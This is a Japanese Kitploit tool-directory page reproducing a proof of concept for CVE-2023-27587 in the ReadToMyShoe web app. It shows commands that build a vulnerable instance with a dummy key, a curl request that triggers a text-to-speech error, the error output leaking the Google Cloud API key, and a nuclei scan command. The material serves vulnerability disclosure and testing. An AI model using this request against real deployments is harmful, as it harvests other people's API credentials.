Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27587-PoC — CVE-2023-27587のシンプルなPoC | Kitploit
ツール/GitHubGitHub/vagnerd/cve-2023-27587-poc
脆弱性分析エクスプロイト情報収集ウェブセキュリティシークレット検出APIセキュリティ
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

CVE-2023-27587のシンプルなPoC

リポジトリを見る
51513年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-27587-PoC

CVE-2023-27587のシンプルなPoC

ReadToMyShoeとは?

ReadtoMyShoe (RTMS)は、記事をURL経由または直接貼り付けてアップロードし、後で聴くことができるWebアプリケーション(rust、yew、axum)です。

影響

記事の追加時にエラーが発生すると、Webサイトはユーザーにエラーメッセージを表示します。エラーがGoogle Cloud TTSリクエストに起因する場合、リクエストの完全なURLが含まれます。リクエストURLにはGoogle Cloud APIキーが含まれています。

PoC

脆弱なReadtoMyShoeのセットアップ

root@kitploit:~
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

エクスプロイト

キーはGCP呼び出しでエラーが発生した場合にのみ露出します!

root@kitploit:~
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

レスポンスエラー(露出したAPIキー):

root@kitploit:~
TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

Screenshot from 2023-03-15 13-03-59

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

root@kitploit:~
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

Screenshot from 2023-03-15 13-22-23

参考文献

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

ツールをダウンロード